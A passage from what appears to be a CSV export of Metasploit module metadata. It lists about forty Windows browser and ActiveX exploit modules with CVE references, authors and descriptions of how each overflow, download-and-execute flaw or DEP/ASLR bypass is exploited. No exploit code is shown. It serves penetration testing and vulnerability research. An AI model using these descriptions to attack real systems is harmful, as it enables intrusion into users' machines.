When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.","Metasploit Framework License (BSD)","f","2010-08-30 00:00:00",0,,"passive","t","CVE-2010-1818, OSVDB-67705, URL-http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1","Ruben Santemarta, jduck " 373,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_mime_type.rb","exploit","windows/browser/apple_quicktime_mime_type","exploit/windows/browser/apple_quicktime_mime_type","Apple QuickTime 7.7.2 MIME Type Buffer Overflow",300,"This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-07 00:00:00",0,,"passive","t","BID-56438, CVE-2012-3753, OSVDB-87088, URL-http://asintsov.blogspot.com.es/2012/11/heapspray.html, URL-http://support.apple.com/kb/HT5581","Pavel Polischouk, juan vazquez " 374,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_rtsp.rb","exploit","windows/browser/apple_quicktime_rtsp","exploit/windows/browser/apple_quicktime_rtsp","Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",300,"This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. 
The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.","Metasploit Framework License (BSD)","f","2007-01-01 00:00:00",0,,"passive","t","BID-21829, CVE-2007-0015, OSVDB-31023, URL-http://projects.info-pull.com/moab/MOAB-01-01-2007.html","MC , egypt " 375,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb","exploit","windows/browser/apple_quicktime_smil_debug","exploit/windows/browser/apple_quicktime_smil_debug","Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",400,"This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL uri, a stack-based buffer overflow can occur when logging an error message.","Metasploit Framework License (BSD)","f","2010-08-12 00:00:00",0,,"passive","t","BID-41962, CVE-2010-1799, OSVDB-66636, URL-http://secunia.com/advisories/40729/, URL-http://support.apple.com/kb/HT4290","Krystian Kloskowski, jduck " 376,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb","exploit","windows/browser/apple_quicktime_texml_font_table","exploit/windows/browser/apple_quicktime_texml_font_table","Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",300,"This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. 
The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).","Metasploit Framework License (BSD)","f","2012-11-07 00:00:00",0,,"passive","t","BID-56557, CVE-2012-3752, OSVDB-87087, URL-http://support.apple.com/kb/HT5581","Arezou Hosseinzad-Amirkhizi, juan vazquez " 377,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ask_shortformat.rb","exploit","windows/browser/ask_shortformat","exploit/windows/browser/ask_shortformat","Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to excute arbitrary code by sending an overly long string to the ""ShortFormat()"" method in askbar.dll.","Metasploit Framework License (BSD)","f","2007-09-24 00:00:00",0,,"passive","t","CVE-2007-5107, OSVDB-37735, URL-http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148","MC " 378,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb","exploit","windows/browser/asus_net4switch_ipswcom","exploit/windows/browser/asus_net4switch_ipswcom","ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",300,"This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll ActiveX control. 
A buffer overflow condition is possible in multiple places due to the use of the CxDbgPrint() function, which allows remote attackers to gain arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-02-17 00:00:00",0,,"passive","t","CVE-2012-4924 , OSVDB-79438, URL-http://dsecrg.com/pages/vul/show.php?id=417","Dmitriy Evdokimov, sinn3r " 379,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/athocgov_completeinstallation.rb","exploit","windows/browser/athocgov_completeinstallation","exploit/windows/browser/athocgov_completeinstallation","AtHocGov IWSAlerts ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor.","Metasploit Framework License (BSD)","f","2008-02-15 00:00:00",0,,"passive","t","URL-http://www.athoc.com/products/IWSAlerts_overview.aspx","MC " 380,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/autodesk_idrop.rb","exploit","windows/browser/autodesk_idrop","exploit/windows/browser/autodesk_idrop","Autodesk IDrop ActiveX Control Heap Memory Corruption",300,"This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. 
An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties.","Metasploit Framework License (BSD)","f","2009-04-02 00:00:00",0,,"passive","t","BID-34352, EDB-8560, OSVDB-53265, URL-http://marc.info/?l=full-disclosure&m=123870112214736","Elazar Broad , Trancer " 381,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aventail_epi_activex.rb","exploit","windows/browser/aventail_epi_activex","exploit/windows/browser/aventail_epi_activex","SonicWALL Aventail epi.dll AuthCredential Format String",300,"This module exploits a format string vulnerability within version 10.0.4.x and 10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX control (epi.dll). By calling the 'AuthCredential' method with a specially crafted Unicode format string, an attacker can cause memory corruption and execute arbitrary code. Unfortunately, it does not appear to be possible to indirectly re-use existing stack data for more reliable exploitation. This is due to several particulars about this vulnerability. First, the format string must be a Unicode string, which uses two bytes per character. Second, the buffer is allocated on the stack using the 'alloca' function. As such, each additional format specifier (%x) will add four more bytes to the size allocated. This results in the inability to move the read pointer outside of the buffer. Further testing showed that using specifiers that pop more than four bytes does not help. Any number of format specifiers will result in accessing the same value within the buffer. NOTE: It may be possible to leverage the vulnerability to leak memory contents. 
However, that has not been fully investigated at this time.","Metasploit Framework License (BSD)","f","2010-08-19 00:00:00",0,,"passive","t","OSVDB-67286, URL-http://sotiriu.de/adv/NSOADV-2010-005.txt","Nikolas Sotiriu, jduck " 382,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/awingsoft_web3d_bof.rb","exploit","windows/browser/awingsoft_web3d_bof","exploit/windows/browser/awingsoft_web3d_bof","AwingSoft Winds3D Player SceneURL Buffer Overflow",200,"This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-07-10 00:00:00",0,,"passive","t","CVE-2009-4588, EDB-9116, OSVDB-60017, URL-http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/, URL-http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt","Trancer , jduck , shinnai " 383,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb","exploit","windows/browser/awingsoft_winds3d_sceneurl","exploit/windows/browser/awingsoft_winds3d_sceneurl","AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",600,"This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. 
Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2009-11-14 00:00:00",0,,"passive","t","CVE-2009-4850, OSVDB-60049","jduck " 384,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb","exploit","windows/browser/baofeng_storm_onbeforevideodownload","exploit/windows/browser/baofeng_storm_onbeforevideodownload","BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",300,"This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method ""OnBeforeVideoDownload"" an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-04-30 00:00:00",0,,"passive","t","BID-34789, CVE-2009-1612, EDB-8579, OSVDB-54169","jduck " 385,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/barcode_ax49.rb","exploit","windows/browser/barcode_ax49","exploit/windows/browser/barcode_ax49","RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in RKD Software Barcode Application ActiveX Control 'BarCodeAx.dll'. 
By sending an overly long string to the BeginPrint method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-06-22 00:00:00",0,,"passive","t","BID-24596, CVE-2007-3435, EDB-4094, OSVDB-37482","Trancek , patrick " 386,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb","exploit","windows/browser/blackice_downloadimagefileurl","exploit/windows/browser/blackice_downloadimagefileurl","Black Ice Cover Page ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""DownloadImageFileURL"" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.","Metasploit Framework License (BSD)","f","2008-06-05 00:00:00",0,,"passive","t","BID-29577, CVE-2008-2683, EDB-5750, OSVDB-46007","mr_me , shinnai, sinn3r " 387,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb","exploit","windows/browser/c6_messenger_downloaderactivex","exploit/windows/browser/c6_messenger_downloaderactivex","Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",600,"This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). 
The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user.","Metasploit Framework License (BSD)","f","2008-06-03 00:00:00",0,,"passive","t","BID-29519, CVE-2008-2551, OSVDB-45960, URL-http://retrogod.altervista.org/9sg_c6_download_exec.html","Nine:Situations:Group::SnoopyAssault, juan vazquez " 388,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb","exploit","windows/browser/ca_brightstor_addcolumn","exploit/windows/browser/ca_brightstor_addcolumn","CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",300,"The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","f","2008-03-16 00:00:00",0,,"passive","t","CVE-2008-1472, OSVDB-43214","dean " 389,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/chilkat_crypt_writefile.rb","exploit","windows/browser/chilkat_crypt_writefile","exploit/windows/browser/chilkat_crypt_writefile","Chilkat Crypt ActiveX WriteFile Unsafe Method",600,"This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing with Administrator. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. 
The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.","Metasploit Framework License (BSD)","f","2008-11-03 00:00:00",0,,"passive","t","BID-32073, CVE-2008-5002, EDB-6963, OSVDB-49510","jduck , shinnai" 390,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_anyconnect_exec.rb","exploit","windows/browser/cisco_anyconnect_exec","exploit/windows/browser/cisco_anyconnect_exec","Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",600,"This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed.","Metasploit Framework License (BSD)","f","2011-06-01 00:00:00",0,,"passive","t","CVE-2011-2039, OSVDB-72714, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909, URL-http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml","bannedit " 391,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_playerpt_setsource.rb","exploit","windows/browser/cisco_playerpt_setsource","exploit/windows/browser/cisco_playerpt_setsource","Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",300,"This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. 
The vulnerability, due to the insecure usage of sprintf in the SetSource method, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-03-22 00:00:00",0,,"passive","t","EDB-18641, OSVDB-80297","juan vazquez , rgod" 392,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb","exploit","windows/browser/cisco_playerpt_setsource_surl","exploit/windows/browser/cisco_playerpt_setsource_surl","Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",300,"This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, when handling a specially crafted sURL argument, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-07-17 00:00:00",0,,"passive","t","BID-54588, CVE-2012-0284, OSVDB-84309, URL-http://secunia.com/secunia_research/2012-25/","Carsten Eiram, juan vazquez " 393,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/citrix_gateway_actx.rb","exploit","windows/browser/citrix_gateway_actx","exploit/windows/browser/citrix_gateway_actx","Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",300,"This module exploits a stack based buffer overflow in the Citrix Gateway ActiveX control. Exploitation of this vulnerability requires user interaction. The victim must click a button in a dialog to begin a scan. This is typical interaction that users should be accustom to. 
Exploitation results in code execution with the privileges of the user who browsed to the exploit page.","Metasploit Framework License (BSD)","f","2011-07-14 00:00:00",0,,"passive","t","CVE-2011-2882, OSVDB-74191, URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929","Michal Trojnara, bannedit , sinn3r " 394,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/clear_quest_cqole.rb","exploit","windows/browser/clear_quest_cqole","exploit/windows/browser/clear_quest_cqole","IBM Rational ClearQuest CQOle Remote Code Execution",300,"This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which allows reliable remote code execution when DEP isn't enabled.","Metasploit Framework License (BSD)","f","2012-05-19 00:00:00",0,,"passive","t","BID-53170, CVE-2012-0708, OSVDB-81443, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-113/, URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow","Andrea Micalizzi aka rgod, juan vazquez " 395,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/communicrypt_mail_activex.rb","exploit","windows/browser/communicrypt_mail_activex","exploit/windows/browser/communicrypt_mail_activex","CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll ActiveX Control provided by CommuniCrypt Mail 1.16. 
By sending a overly long string to the ""AddAttachments()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-19 00:00:00",0,,"passive","t","EDB-12663, OSVDB-64839","Lincoln, dookie" 396,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/creative_software_cachefolder.rb","exploit","windows/browser/creative_software_cachefolder","exploit/windows/browser/creative_software_cachefolder","Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-05-28 00:00:00",0,,"passive","t","CVE-2008-0955, OSVDB-45655","MC " 397,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/crystal_reports_printcontrol.rb","exploit","windows/browser/crystal_reports_printcontrol","exploit/windows/browser/crystal_reports_printcontrol","Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",300,"This module exploits a heap based buffer overflow in the CrystalPrintControl ActiveX, while handling the ServerResourceVersion property. The affected control can be found in the PrintControl.dll component as included with Crystal Reports 2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1. 
The module uses the msvcr71.dll library, loaded by the affected ActiveX control, to bypass DEP and ASLR.","Metasploit Framework License (BSD)","f","2010-12-14 00:00:00",0,,"passive","t","BID-45387, CVE-2010-2590, EDB-15733, OSVDB-69917","Dmitriy Pletnev, Dr_IDE, juan vazquez " 398,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/dell_webcam_crazytalk.rb","exploit","windows/browser/dell_webcam_crazytalk","exploit/windows/browser/dell_webcam_crazytalk","Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",300,"This module exploits a vulnerability in Dell Webcam's CrazyTalk component. Specifically, when supplying a long string for a file path to the BackImage property, an overflow may occur after checking certain file extension names, resulting in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-19 00:00:00",0,,"passive","t","EDB-18621, OSVDB-80205, URL-http://www.dell.com/support/drivers/us/en/04/DriverDetails/DriverFileFormats?c=us&l=en&s=bsd&cs=04&DriverId=R230103","rgod, sinn3r " 399,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/dxstudio_player_exec.rb","exploit","windows/browser/dxstudio_player_exec","exploit/windows/browser/dxstudio_player_exec","Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution",600,"This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. 
NOTE: This exploit uses additionally dangerous script features to write to local files!","Metasploit Framework License (BSD)","f","2009-06-09 00:00:00",0,,"passive","t","BID-35273, CVE-2009-2011, EDB-8922, OSVDB-54969, URL-http://dxstudio.com/guide.aspx","jduck " 400,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ea_checkrequirements.rb","exploit","windows/browser/ea_checkrequirements","exploit/windows/browser/ea_checkrequirements","Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-08 00:00:00",0,,"passive","t","CVE-2007-4466, OSVDB-37723","MC " 401,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb","exploit","windows/browser/ebook_flipviewer_fviewerloading","exploit/windows/browser/ebook_flipviewer_fviewerloading","FlipViewer FViewerLoading ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0. 
The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the ""LoadOpf()"" method.","BSD License","f","2007-06-06 00:00:00",0,,"passive","t","BID-24328, CVE-2007-2919, OSVDB-37042","LSO " 402,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/enjoysapgui_comp_download.rb","exploit","windows/browser/enjoysapgui_comp_download","exploit/windows/browser/enjoysapgui_comp_download","EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""Comp_Download"" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).","Metasploit Framework License (BSD)","f","2009-04-15 00:00:00",0,,"passive","t","CVE-2008-4830, OSVDB-53680, URL-http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf","MC " 403,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb","exploit","windows/browser/enjoysapgui_preparetoposthtml","exploit/windows/browser/enjoysapgui_preparetoposthtml","EnjoySAP SAP GUI ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending an overly long string to the ""PrepareToPostHTML()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-07-05 00:00:00",0,,"passive","t","BID-24772, CVE-2007-3605, OSVDB-37690","MC " 404,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/facebook_extractiptc.rb","exploit","windows/browser/facebook_extractiptc","exploit/windows/browser/facebook_extractiptc","Facebook Photo Uploader 4 ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Facebook Photo Uploader 4. 
By sending an overly long string to the ""ExtractIptc()"" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-31 00:00:00",0,,"passive","t","BID-27534, CVE-2008-5711, EDB-5049, OSVDB-41073","MC " 405,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb","exploit","windows/browser/foxit_reader_plugin_url_bof","exploit/windows/browser/foxit_reader_plugin_url_bof","Foxit Reader Plugin URL Processing Buffer Overflow",300,"This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"passive","t","BID-57174, EDB-23944, OSVDB-89030, URL-http://retrogod.altervista.org/9sg_foxit_overflow.htm, URL-http://secunia.com/advisories/51733/","Sven Krewitt , juan vazquez , rgod " 406,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/gom_openurl.rb","exploit","windows/browser/gom_openurl","exploit/windows/browser/gom_openurl","GOM Player ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. 
By sending an overly long string to the ""OpenUrl()"" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-27 00:00:00",0,,"passive","t","CVE-2007-5779, OSVDB-38282, URL-http://secunia.com/advisories/27418/","MC " 407,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/greendam_url.rb","exploit","windows/browser/greendam_url","exploit/windows/browser/greendam_url","Green Dam URL Processing Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.","Metasploit Framework License (BSD)","f","2009-06-11 00:00:00",0,,"passive","t","EDB-8938, OSVDB-55126, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.cse.umich.edu/~jhalderm/pub/gd/","Trancer " 408,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb","exploit","windows/browser/honeywell_hscremotedeploy_exec","exploit/windows/browser/honeywell_hscremotedeploy_exec","Honeywell HSC Remote Deployer ActiveX Remote Code Execution",600,"This modules exploits a vulnerability found in the Honewell HSC Remote Deployer ActiveX. This control can be abused by using the LaunchInstaller() function to execute an arbitrary HTA from a remote location. 
This module has been tested successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI R410.1.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",0,,"passive","t","BID-58134, CVE-2013-0108, OSVDB-90583, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf, URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi","juan vazquez " 409,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/honeywell_tema_exec.rb","exploit","windows/browser/honeywell_tema_exec","exploit/windows/browser/honeywell_tema_exec","Honeywell Tema Remote Installer ActiveX Remote Code Execution",600,"This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote Installer. This ActiveX control can be abused by using the DownloadFromURL() function to install an arbitrary MSI from a remote location without checking source authenticity or user notification. This module has been tested successfully with the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2011-10-20 00:00:00",0,,"passive","t","BID-50078, OSVDB-76681, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf","Billy Rios, Terry McCorkle, juan vazquez " 410,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb","exploit","windows/browser/hp_alm_xgo_setshapenodetype_exec","exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec","HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",300,"This module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. 
It allows to control the dereference and use of a function pointer. This module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.","Metasploit Framework License (BSD)","f","2012-08-29 00:00:00",0,,"passive","t","BID-55272, OSVDB-85152, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-170/","juan vazquez , rgod " 411,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb","exploit","windows/browser/hp_easy_printer_care_xmlcachemgr","exploit/windows/browser/hp_easy_printer_care_xmlcachemgr","HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",500,"This module allows remote attackers to place arbitrary files on a users file system by abusing the ""CacheDocumentXMLWithId"" method from the ""XMLCacheMgr"" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. 
